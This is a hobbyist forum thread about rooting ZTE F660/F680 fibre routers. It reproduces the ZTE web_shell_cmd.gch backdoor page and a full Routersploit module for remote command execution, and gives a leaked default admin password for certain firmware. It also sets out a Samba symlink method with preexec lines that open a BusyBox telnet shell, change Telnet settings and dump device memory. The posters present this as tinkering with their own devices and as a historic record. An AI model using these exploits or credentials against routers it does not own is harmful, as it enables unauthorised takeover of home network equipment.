ZTE ZXHN F660 - Power to the masses

Newtman
Мнения: 3
Регистриран на: 02 Май 2018 04:22

Re: ZTE ZXHN F660 - Power to the masses

Мнение от Newtman »

Hello,
We have another problem, I have got F660v5 running firmware "t38" and the passwords are encrypted! When you print infirmation with sendcmd (by TTL) passwords are in asterisk.
I rolled back to the first FW and I got the passwords without problem but is different in the latest firmware.
I guess the new F670 have got the encryption too.

Do you know something about this?
Аватар
error_404
Глобален модератор
Мнения: 356
Регистриран на: 22 Дек 2012 10:58

Re: ZTE ZXHN F660 - Power to the masses

Мнение от error_404 »

Hi,
first of all I only have F660 and for this reason I cannot give feedback for F670.
If in the new firmware the password is encrypted you can change it as root and create another user with Telnet access!

Код за потвърждение: Избери целия код

sed -i "s|TS_Enable" val="0"|TS_Enable" val="1"|g" /userconfig/cfg/db_default_cfg.xml
of course with root which you mention you've gained
:evil:
Изображение
"За мен най-лошото в България е чудесното наслаждение, което тук имат хората да се преследват един друг и да развалят един другиму работата."
К.Иречек, 13.12.1881
Newtman
Мнения: 3
Регистриран на: 02 Май 2018 04:22

Re: ZTE ZXHN F660 - Power to the masses

Мнение от Newtman »

error_404 написа: 22 Авг 2018 20:09 Hi,
first of all I only have F660 and for this reason I cannot give feedback for F670.
If in the new firmware the password is encrypted you can change it as root and create another user with Telnet access!

Код за потвърждение: Избери целия код

sed -i "s|TS_Enable" val="0"|TS_Enable" val="1"|g" /userconfig/cfg/db_default_cfg.xml
of course with root which you mention you've gained
:evil:
Yes, I know. I changed the password but I want an easy way to access as admin without open the ONT...In consecuence, know the original password.
Do you know where's is stored the hash?

Thanks!
Newtman
Мнения: 3
Регистриран на: 02 Май 2018 04:22

Re: ZTE ZXHN F660 - Power to the masses

Мнение от Newtman »

Today I found a new firmware on F660 v5.2... V5.2.10P3T52 :thumbdown:
I can't enter by TTL because now root/root don't work anymore. Telnet is closed by LAN too...

I think we haven't got more options now, what do you think?

My idea now is dump the NAND, is a F59L1G81MA. I have got a pair of "universal" programmers, I need the socket now.
Аватар
error_404
Глобален модератор
Мнения: 356
Регистриран на: 22 Дек 2012 10:58

For historic archive: WebShell Command Exploit

Мнение от error_404 »

Just Путин some exploit which was not working anymore, but for historic reasons and knowledge!

https://blog.rapid7.com/2014/03/03/disc ... -backdoor/
http://cve.mitre.org/cgi-bin/cvename.cg ... -2014-2321
https://www.kb.cert.org/vuls/id/600724/

web_shell_cmd.gch
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<META HTTP-EQUIV="pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Cache-Control" CONTENT="no-cache, must-revalidate">
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>
F660 Webshell
</title>
<LINK REL="stylesheet" HREF="css/login.css" TYPE="text/css" />
<LINK REL="stylesheet" HREF="css/template.css" TYPE="text/css" />
<style>
* {
margin: 0 0 0 0;
padding: 0;
}
.textarea_1 {
height:420px;
width:794px;
border:1px solid #7F9DB7;
font-size: 12px;
font-family: Verdana, Geneva, Arial, Helvetica, sans-serif;
text-align:left;
}
#e8_container {
margin: 0 auto;
width: 800px;
text-align: left;
position: relative;
min-height: 600px;
height: 600px;
height: 600px;
}
#banner {
width:800px;
height:70px;
}
.bottom_td3 {
width:800px;
background-color:#eeeeee;
margin-right:2px;
text-align:right;
}
.copyright {
float:left;
display:block;
height:16px;
width:800px;
padding-top:10px;
border-left:1px solid #B1B1B1;
border-right:1px solid #B1B1B1;
text-align:center;
}
.bottom_line {
float:left;
display:block;
background-color:#5aa929;
height:8px;
width:800px;
}
.type{
position:absolute;
top:32px;left:540px;
font:20px Arial,sans-serif;
color:#fff;z-index:999;
}
.inputId {
width:720px;
}
table.table td.td11 {
width:30%;
height:24px;
text-align:right;
}
</style>
<script language="javascript">

function getObj(id) {
return (document.getElementById(id));
}

function jslSetValue(src, dst) {
var ss = document.getElementById(dst).value;
document.getElementById(src).value = ss;
}

function setValue(id, value) {
document.getElementById(id).value = value;
}

function Transfer_meaning(id, value) {
document.getElementById(id).value = value;
}
function getValue(id) {
return (document.getElementById(id).value);
}

function jslDisable(id) {
var i;
var num = jslDisable.arguments.length;
if (num == 0) return;
for (i = 0; i < num; i++) {
document.getElementById(arguments).disabled = true;
}
}
var CMD_PARA = new Array(
"Cmd",
"CmdAck"
);
function pageLoad(url) {
getObj("running").style.display = "none";
}
function pageSetValue() {
jslSetValue("Cmd", "Frm_Cmd");
}
function pageSubmit() {
jslDisable("Btn_Submit");
pageSetValue();
setValue("IF_ACTION", "apply");
getObj("running").style.display = "";
getObj("running_title").innerHTML = "it is running, please wait...";
getObj("fSubmit").submit();
}
</script>
<%
IMPORT FILE "common_gch.gch";
var FP_ERRORSTR = "SUCC";
var FP_PARANUM = 2;
var PARA[2] =
{
"Cmd",
"CmdAck"
};

create_form_start("fSubmit", "'/web_shell_cmd.gch'");
createBasicHidden();
create_hidden_newpara(PARA, FP_PARANUM);
var CmdAck="";
var Cmd = request("Cmd");
var FP_ACTION = request("IF_ACTION");
if(FP_ACTION == "apply")
{
CmdAck = show_shellcmd(Cmd);
}
getDisplayInstError(FP_ERRORSTR);
undoDBSave();

create_form_end();
%>
</head>

<body>
<div id="e8_container" style="background-color:#eeeeee;">
<div id="head">
<div id="banner" style="background-image:url(img/banner.gif); background-repeat:no-repeat"></div>
</div>
<table class="table" width="500px" border="0" align="center">
<tr>
</tr>
<tr id="running" class="white" style="display: none;">
<td>
<font id="running_title" style="display: ;"></font>&nbsp;&nbsp;<img src="img/uploading.gif">
</td>
</tr>
<tr>
<td class="td3" colspan="2">
</td>
</tr>
<tr>
<td class="td11" id="Fnt_Cmd">Command: </td>
<td class="td2">
<input name="textfield22" type="text" id="Frm_Cmd" class="inputId" value="" size="150" />
</td>
</tr>
<tr>
<td colspan="2" align="right">
<input name='Submit' type='button' id='Btn_Submit' onclick=pageSubmit() class='button' value=' Submit ' /></td>
</tr>
<br>
<tr>
<td class="td3" colspan="2">
<textarea cols="" rows="" id="Frm_CmdAck" class="textarea_1"><%=CmdAck;%></textarea>
</td>
</tr>
</table>
<br>
</div>
</body>

</html>


Routersploit Module
f460_f660_backdoor.py

import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
__info__ = {
"name": "ZTE F460 & F660 Backdoor RCE",
"description": "Exploits ZTE F460 and F660 backdoor vulnerability that allows "
"executing commands on operating system level.",
"authors": (
"Rapid7", # vulnerabilty discovery
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
"references": (
"https://community.rapid7.com/community/ ... h-backdoor",
),
"devices": (
"ZTE F460",
"ZTE F660",
),
}

target = OptIP("", "Target IPv4 or IPv6 address")
port = OptPort(80, "Target HTTP port")

def run(self):
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop")
shell(self)
else:
print_error("Exploit failed - target seems to be not vulnerable")

def execute(self, cmd):
data = {
"IF_ACTION": "apply",
"IF_ERRORSTR": "SUCC",
"IF_ERRORPARAM": "SUCC",
"IF_ERRORTYPE": "-1",
"Cmd": cmd,
"CmdAck": ""
}

response = self.http_request(
method="POST",
path="/web_shell_cmd.gch",
data=data
)
if response is None:
return ""

if response.status_code == 200:
regexp = '<textarea cols="" rows="" id="Frm_CmdAck" class="textarea_1">(.*?)</textarea>'
res = re.findall(regexp, response.text, re.DOTALL)

if len(res):
return res[0]

return ""

@mute
def check(self):
marker = utils.random_text(32)
cmd = "echo {}".format(marker)

response = self.execute(cmd)
if marker in response:
return True # target is vulnerable

return False # target is not vulnerable

Изображение
"За мен най-лошото в България е чудесното наслаждение, което тук имат хората да се преследват един друг и да развалят един другиму работата."
К.Иречек, 13.12.1881
Аватар
error_404
Глобален модератор
Мнения: 356
Регистриран на: 22 Дек 2012 10:58

ZTE ZXHN F660v5 FW T38 y T52 - 2019

Мнение от error_404 »

Muchas gracias @Alejandro in SPAMLoco Forum
AUG.2019

5u4r3Z=%

:clap:
Изображение
"За мен най-лошото в България е чудесното наслаждение, което тук имат хората да се преследват един друг и да развалят един другиму работата."
К.Иречек, 13.12.1881
jimpapi
Мнения: 1
Регистриран на: 21 Юни 2020 18:56

Re: ZTE ZXHN F660 - Power to the masses

Мнение от jimpapi »

Hello to everybody...it' a nice article and helps a lot. I am trying to create my firmware by dumping from my mtdblocks
My ZTE is ZXHN h267A h.v 1.1

# cat /proc/mtd
dev: size erasesize name
mtd0: 075e0000 00020000 "Whole flash"
mtd1: 00040000 00020000 "Bootloader"
mtd2: 00040000 00020000 "tag"
mtd3: 00200000 00020000 "config"
mtd4: 01400000 00020000 "rootfs1"
mtd5: 00400000 00020000 "kernel1"
mtd6: 00400000 00020000 "kernel2"
mtd7: 01400000 00020000 "rootfs2"
mtd8: 00900000 00900000 "ram_flash"

I saved my mtdblock0 (whole flash) to my computer with the help of tftp server
i tried to binwalk the mtdblock0 and i really found the start of magic header 99 99 99 99 44 44 44 44
i compared the chunks in memory and i found the part that contains the kernel and rootfs...i created my upgrade.bin with these two (in mtdblock0 they are concatenated already)
I don't have the original firmware but i compare with another firmware for the H267A from another country (different IPS provider)
The size of my created firmware is a little smaller that the original i found...
Please help...did i miss something?
I binwalk the original firmware but the unsquashfs_all doen't support the file system...so i can't decompress...i do all the work in hex viewer and by SSH my router...
Thanks in advance!
Аватар
error_404
Глобален модератор
Мнения: 356
Регистриран на: 22 Дек 2012 10:58

ZTE ZXHN F680 - Update for the masses

Мнение от error_404 »

Hello boys and gils,
a long long time ago I have too much time to play with F660, but......now ANTEL are taking the step to change the old F660 with the brand new F680 [better WiFi + extender option and can handle up to 800 Mbits), so the new challange is about to begin....

I'll try the samba exploiting method first as well and of course using UART for debugging and to found some new treasures....

As you know F660 is already covered to the max w/o the firmwares which will be nice to have some repository of different firmwares as is very common product for PON providers worldwide.....

HINT and TIP:
Use USB with symbolic link to exploit SAMBA and enbale it on the F680 with instalador/wwzz2233

Код за потвърждение: Избери целия код

ln -s /var/samba/lib/smb.conf
Look on internet for how to modify the smb.conf on the fly and how to make reverse telnet....

Код за потвърждение: Избери целия код

preexec = /mnt/usb1_1/busybox telnetd -b 192.168.1.1:2323 -l /mnt/usb2_1_1/sh
[will make telnet to listen on port 2323]
Also obtan BusyBox for the current harware architecture (arm71 or MIPS) and copy as 2 files same content 1:1 - busybox and sh ....(yes we'll use BusyBox as SHELL ;)
On the USB drive apart from the symbolic link you must have both files which are the same.
(this is public vailable information and is everywhere trust me, credits goes to the authors)

Something like this:

Код за потвърждение: Избери целия код

preexec = /bin/sh -c '(sendcmd 1 DB set TelnetCfg 0 UserTypeFlag 0 && sendcmd 1 DB save) 2> /mnt/usb1_1/cmd.err > /mnt/usb1_1/cmd.out'
Make a dump of the memory:

Код за потвърждение: Избери целия код

preexec = /bin/cat /dev/mem > /mnt/usb1_1/ramf680.txt
This is very raw raw material and mostly notes as I'm waiting for the hardware to attach the UART and DEBUG the dEVIL ;)
Изображение
"За мен най-лошото в България е чудесното наслаждение, което тук имат хората да се преследват един друг и да развалят един другиму работата."
К.Иречек, 13.12.1881
Публикувай отговор